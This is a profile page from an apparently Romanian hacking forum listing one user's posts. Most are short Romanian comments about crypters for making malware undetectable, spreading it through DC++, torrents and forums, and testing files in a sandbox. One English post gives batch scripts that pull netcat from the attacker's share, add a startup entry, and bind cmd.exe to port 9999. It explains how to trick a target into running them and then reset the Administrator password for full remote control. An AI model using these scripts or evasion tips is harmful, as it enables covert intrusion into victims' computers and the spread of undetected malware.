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Everything posted by dark87

  1. Eu sunt din Cluj
  2. Virustotal.com il strica numa e fud , foloseste novirusthanks2
  3. Am inteles
  4. Ok multam numai apare nimic nici un crypter pt rst ?
  5. As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in: Code: @echo off cd\ xcopy \\yourIP\shared folder\netcat.exe copy \\yourIP\shared folder\netcat.exe (just to be sure) cd "Documents and Settings" cd "All Users" cd "Start Menu" cd Programs cd Startup xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write) cd\ netcat.exe -L -p 9999 -d -e cmd.exe Save the file as a batch file using Notepad. The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type: Code: @echo off cd\ netcat.exe -L -p 9999 -d -e cmd.exe Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this: net user Administrator newpassword Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in: shutdown -r -t 10 -c "Hello" the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more! Enjoy.
  6. Nytro cat la % iti vede serveru cryptat pe Royal Crypter ? ca am nevoie de un crypter cat de cat bun
  7. dark87

    novo line

    Iti spun asa ca intre amici sa te lasi de meseria asta daca vrei sa ma asculti daca nu faci ce vrei cu viata ta zi de zi
  8. dark87


    lol )
  9. Pentru asa ceva trebuie sa ai si banda , ca daca nu ai te trezesti ca pici si tu
  10. dark87


    Bun Venit !
  11. Nu prea cred ca ii clean 100% , dar in fine verificati si vedeti eu le deschid cu sandbox
  12. Tare de tot piesa
  13. dark87


    Salut , Bun venit !
  14. Ma fac vegetarian numai mananc carne )
  15. dark87


    Ori faci spread pe dc++ cu programul PhazeNameLeecher
  16. dark87


    Daca ai cont de upload il poti urca pe Filelist si sa fie 100% fud serveru ca daca nu e teo banat
  17. dark87


    Spam dc++ , forumuri , torrent
  18. Cu bataia nu rezolvi nimic
  19. Acest baiat care o postat anuntul asta ii un copil care se plictiseste si nu are ce face , ai vrea tu ma baiatule sa fi ca Ne0h .
  20. ..:: Ynhub Redirect ::.. - PrintScreen Ynhub Redirect : http://i35.tinypic.com/2cdbh47.png
  21. Cine crezi ca da un steam cu jocuri pe el pe un kkt de cont iplay
  22. Bravo baietii felicitarile mele pentru cine o spart a doua oara
  23. <font color="white">Tip:</font> Altul<br><br><font color="white">Link:</font> <br><br><font color="white">Detalii:</font><br>
  24. Ori il dechideti in programul sandbox
  25. Bravo Codex imi place culorile si tot
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